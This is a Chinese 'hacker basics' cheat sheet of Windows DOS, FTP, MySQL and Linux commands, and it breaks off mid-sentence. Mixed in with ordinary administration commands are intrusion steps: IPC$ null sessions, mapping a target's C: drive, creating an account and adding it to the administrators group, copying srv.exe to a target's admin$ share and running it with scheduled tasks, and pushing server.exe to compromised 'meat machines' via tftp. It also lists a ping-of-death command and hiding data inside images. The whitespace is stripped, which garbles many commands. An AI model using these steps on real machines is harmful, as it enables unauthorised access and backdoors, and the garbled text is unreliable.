黑客基礎之DOS大全 netuse$ipipc$/user:建立IPC空鏈接 netuse$ipipc$密碼/user:用戶名建立IPC非空鏈接 netuseh:$ipc$密碼/user:用戶名直接登陸后映射對方C：到本地為H: netuseh:$ipc$登陸后映射對方C：到本地為H: netuse$ipipc$/del刪除IPC鏈接 netuseh:/del刪除映射對方到本地的為H:的映射 netuser用戶名密碼/add建立用戶 netuserguest/active:yes激活guest用戶 netuser查看有哪些用戶 netuser帳戶名查看帳戶的屬性 netlocalgroupadministrators用戶名/add把“用戶”添加到管理員中使其具有管理員權限,注意：administrator后加s用復數 netstart查看開啟了哪些服務 netstart服務名開啟服務；(如:netstarttelnet，netstartschedule) netstop服務名停止某服務 nettime目標ip查看對方時間 nettime目標ip/set設置本地計算機時間與“目標IP”主機的時間同步,加上參數/yes可取消確認信息 netview查看本地局域網內開啟了哪些共享 netviewip查看對方局域網內開啟了哪些共享 netconfig顯示系統網絡設置 netlogoff斷開連接的共享 netpause服務名暫停某服務 netsendip文本信息向對方發信息 netver局域網內正在使用的網絡連接類型和信息 netshare查看本地開啟的共享 netshareipc$開啟ipc$共享 netshareipc$/del刪除ipc$共享 netsharec$/del刪除C：共享 netuserguest12345用guest用戶登陸后用將密碼改為12345 netpassword密碼更改系統登陸密碼 netstat-a查看開啟了哪些端口,常用netstat-an netstat-n查看端口的網絡連接情況，常用netstat-an netstat-v查看正在進行的工作 netstat-p協議名例：netstat-ptcq/ip查看某協議使用情況（查看tcp/ip協議使用情況） netstat-s查看正在使用的所有協議使用情況 nbtstat-Aip對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫 tracert-參數ip(或計算機名)跟蹤路由（數據包），參數：“-w數字”用于設置超時間隔。 pingip(或域名)向對方主機發送默認大小為32字節的數據，參數：“-l空格數據包大小”；“-n發送數據次數”；“-t”指一直ping。 ping-t-l65550ip死亡之ping(發送大于64K的文件并一直ping就成了死亡之ping) ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址，ipconfig可用參數“/all”顯示全部配置信息 tlist-t以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內) kill-F進程名加-F參數后強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內) del-F文件名加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR*.*”表示刪除當前目錄下所有只讀文件，“DEL/A-S*.*”表示刪除當前目錄下除系統文件以外的所有文件 del/S/Q目錄或用：rmdir/s/Q目錄/S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同） move盤符路徑要移動的文件名存放移動文件的路徑移動后文件名移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋 fcone.txttwo.txt3st.txt對比二個文件并把不同之處輸出到3st.txt文件中，和是重定向命令 atid號開啟已注冊的某個計劃任務 at/delete停止所有計劃任務，用參數/yes則不需要確認就直接停止 atid號/delete停止某個已注冊的計劃任務 at查看所有的計劃任務 atiptime程序名(或一個命令)/r在某時間運行對方某程序并重新啟動計算機 fingerusernamehost查看最近有哪些用戶登陸 telnetip端口遠和登陸服務器,默認端口為23 openip連接到IP（屬telnet登陸后的命令） telnet在本機上直接鍵入telnet將進入本機的telnet copy路徑文件名1路徑文件名2/y復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件 copyc:srv.exe$ipadmin$復制本地c:srv.exe到對方的admin下 cppy1st.jpg/b+2st.txt/a3st.jpg將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件 copy$svv.exeipadmin$svv.exec:或:copyipadmin$*.*復制對方admini$共享下的srv.exe文件（所有文件）至本地C： xcopy要復制的文件或目錄樹目標地址目錄名復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件 tftp-i自己IP(用肉機作跳板時這用肉機IP)getserver.exec:server.exe登陸后，將“IP”的server.exe下載到目標主機c:server.exe參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i則以ASCII模式（傳送文本文件模式）進行傳送 tftp-i對方IPputc:server.exe登陸后，上傳本地c:server.exe至主機 ftpip端口用于上傳文件至服務器或進行文件操作，默認端口為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時) routeprint顯示出IP路由，將主要顯示網絡地址Networkaddres，子網掩碼Netmask，網關地址Gatewayaddres，接口地址Interface arp查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp-a將顯示出全部信息 start程序名或命令/max或/min新開一個新窗口并最大化（最小化）運行某程序或命令 mem查看cpu使用情況 attrib文件名(目錄名)查看某文件（目錄）的屬性 attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存檔，只讀，系統，隱藏屬性；用則是添加為某屬性 dir查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間 date/t、time/t使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間，而不必輸入新日期和時間 set指定環境變量名稱=要指派給變量的字符設置環境變量 set顯示當前所有的環境變量 setp(或其它字符)顯示出當前以字符p(或其它字符)開頭的所有環境變量 pause暫停批處理程序，并顯示出：請按任意鍵繼續. if在批處理程序中執行條件處理（更多說明見if命令及變量） goto標簽將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：“：start”標簽） call路徑批處理文件名從批處理程序中調用另一個批處理程序（更多說明見call/?） for對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變量） echoon或off打開或關閉echo，僅用echo不加參數則顯示當前echo設置 echo信息在屏幕上顯示出信息 echo信息pass.txt將信息保存到pass.txt文件中 findstrHelloaa.txt在aa.txt文件中尋找字符串hello find文件名查找某文件 title標題名字更改CMD窗口標題名字 color顏色值設置cmd控制臺前景和背景顏色；0黑、1藍、2綠、3淺綠、4紅、5紫、6黃、7=白、8=灰、9=淡藍、A淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白prompt名稱更改cmd.exe的顯示的命令提示符(把C:、D:統一改為：EntSky) print文件名打印文本文件 ver在DOS窗口下顯示版本信息 winver彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名） format盤符/FS:類型格式化磁盤,類型:FAT、FAT32、NTFS,例：FormatD:/FS:NTFS md目錄名創建目錄 replace源文件要替換文件的目錄替換文件 ren原文件名新文件名重命名文件名 tree以樹形結構顯示出目錄，用參數-f將列出第個文件夾中文件名稱 type文件名顯示文本文件的內容 more文件名逐屏顯示輸出文件 doskey要鎖定的命令字符 doskey要解鎖命令=為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，并創建宏)。如：鎖定dir命令：doskeydir=entsky(不能用doskeydir=dir)；解鎖：doskeydir= taskmgr調出任務管理器 chkdsk/FD:檢查磁盤D并顯示狀態報告；加參數/f并修復磁盤上的錯誤 tlntadmntelnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認端口23為其它任何端口 exit退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe path路徑可執行文件的文件名為可執行文件設置一個路徑。 cmd啟動一個win2K命令解釋窗口。參數：/eff、/en關閉、開啟命令擴展；更我詳細說明見cmd/? regedit/s注冊表文件名導入注冊表；參數/S指安靜模式導入，無任何提示； regedit/e注冊表文件名導出注冊表 cacls文件名參數顯示或修改文件訪問控制列表（ACL）針對NTFS格式時。參數：/D用戶名:設定拒絕某用戶訪問；/P用戶名:perm替換指定用戶的訪問權限；/G用戶名:perm賦予指定用戶訪問權限；Perm可以是:N無，R讀取，W寫入，C更改(寫入)，F完全控制；例：caclsD:test.txt/Dpub設定d:test.txt拒絕pub用戶訪問。 cacls文件名查看文件的訪問用戶權限列表 REM文本內容在批處理文件中添加注解 netsh查看或更改本地網絡配置情況 IIS服務命令： iisreset/reboot重啟win2k計算機（但有提示系統將重啟信息出現） iisreset/start或stop啟動（停止）所有Internet服務 iisreset/restart停止然后重新啟動所有Internet服務 iisreset/status顯示所有Internet服務狀態 iisreset/enable或disable在本地系統上啟用（禁用）Internet服務的重新啟動 iisreset/rebootonerror當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機 iisreset/noforce若無法停止Internet服務，將不會強制終止Internet服務 iisreset/timeoutVal在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。 FTP命令：(后面有詳細說明內容) ftp的命令行格式為: ftpvding主機名v顯示遠程服務器的所有響應信息。 d使用調試方式。 n限制ftp的自動登錄,即不使用.netrc文件。 g取消全局文件名。 help命令或？命令查看命令說明 bye或quit終止主機FTP進程,并退出FTP管理方式. pwd列出當前遠端主機目錄 put或send本地文件名上傳到主機上的文件名將本地一個文件傳送至遠端主機中 get或recv遠程主機文件名下載到本地后的文件名從遠端主機中傳送至本地主機中 mgetremote-files從遠端主機接收一批文件至本地主機 mputlocal-files將本地主機中一批文件傳送至遠端主機 dir或lsremote-directorylocal-file列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件 ascii設定以ASCII方式傳送文件(缺省值) bin或image設定以二進制方式傳送文件 bell每完成一次文件傳送,報警提示 cdup返回上一級目錄 close中斷與遠程服務器的ftp會話(與open對應) openhostport建立指定ftp服務器連接,可指定連接端口 delete刪除遠端主機中的文件 mdeleteremote-files刪除一批文件 mkdirdirectory-name在遠端主機中建立目錄 renamefromto改變遠端主機中的文件名 rmdirdirectory-name刪除遠端主機中的目錄 status顯示當前FTP的狀態 system顯示遠端主機系統類型 useruser-namepasswordaccount重新以別的用戶名登錄遠端主機 openhostport重新建立一個新的連接 prompt交互提示模式 macdef定義宏命令 lcd改變當前本地主機的工作目錄,如果缺省,就轉到當前用戶的HOME目錄 chmod改變遠端主機的文件權限 case當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母 cdremotedir進入遠程主機目錄 cdup進入遠程主機目錄的父目錄 !在本地機中執行交互shell，exit回到ftp環境,如!ls.zip MYSQL命令： mysql-h主機地址-u用戶名p密碼連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。 （例：mysql-h10-Uroot-P123456 注:u與root可以不用加空格，其它也一樣） exit退出MYSQL mysqladmin-u用戶名-p舊密碼password新密碼修改密碼 grantselecton數據庫.*to用戶名登錄主機identifiedby密碼;增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以后面都帶一個分號作為命令結束符） showdatabases;顯示數據庫列表。剛開始時才兩個數據庫：mysql和test。mysql庫很重要它里面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。 usemysql； showtables;顯示庫中的數據表 describe表名;顯示數據表的結構 createdatabase庫名;建庫 use庫名； createtable表名(字段設定列表)；建表 dropdatabase庫名; droptable表名；刪庫和刪表 deletefrom表名;將表中記錄清空 select*from表名;顯示表中的記錄 mysqldump-optschoolschool.bbb備份數據庫：（命令在DOS的mysqlbin目錄下執行）;注釋:將數據庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。 win2003系統下新增命令（實用部份）： shutdown/參數關閉或重啟本地或遠程主機。 參數說明：/S關閉主機，/R重啟主機，/T數字設定延時的時間，范圍0180秒之間，/A取消開機，/M/IP指定的遠程主機。 例：shutdown/r/t0立即重啟本地主機（無延時） taskill/參數進程名或進程的pid終止一個或多個任務和進程。 參數說明：/PID要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM要終止的進程的進程名，/F強制終止進程，/T終止指定的進程及他所啟動的子進程。 tasklist顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。 參數說明：/M列出當前進程加載的dll文件，/SVC顯示出每個進程對應的服務，無參數時就只列出當前的進程。 Linux系統下基本命令：要區分大小寫 uname顯示版本信息（同win2K的ver） dir顯示當前目錄文件,ls-al顯示包括隱藏文件（同win2K的dir） pwd查詢當前所在的目錄位置 cdcd.回到上一層目錄，注意cd與.之間有空格。cd/返回到根目錄。 cat文件名查看文件內容 catabc.txt往abc.txt文件中寫上內容。 more文件名以一頁一頁的方式顯示一個文本文件。 cp復制文件 mv移動文件 rm文件名刪除文件，rm-a目錄名刪除目錄及子目錄 mkdir目錄名建立目錄 rmdir刪除子目錄，目錄內沒有文檔。 chmod設定檔案或目錄的存取權限 grep在檔案中查找字符串 diff檔案文件比較 find檔案搜尋 date現在的日期、時間 who查詢目前和你使用同一臺機器的人以及Login時間地點 w查詢目前上機者的詳細資料 whoami查看自己的帳號名稱 groups查看某人的Group passwd更改密碼 history查看自己下過的命令 ps顯示進程狀態 kill停止某進程 gcc黑客通常用它來編譯C語言寫的文件 su權限轉換為指定使用者 telnetIPtelnet連接對方主機（同win2K），當出現bash$時就說明連接成功。 ftpftp連接上某服務器（同win2K） 附：批處理命令與變量 1：for命令及變量基本格式： FOR/參數%variableIN(set)DOcommandcommand_parameters%variable:指定一個單一字母可替換的參數，如：%i，而指定一個變量則用：%i，而調用變量時用：%i%，變量是區分大小寫的（%i不等于%I）。 批處理每次能處理的變量從%0%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2%9指輸入的第2-9個值；例：netuse$ipipc$pass/user:user中ip為%1,pa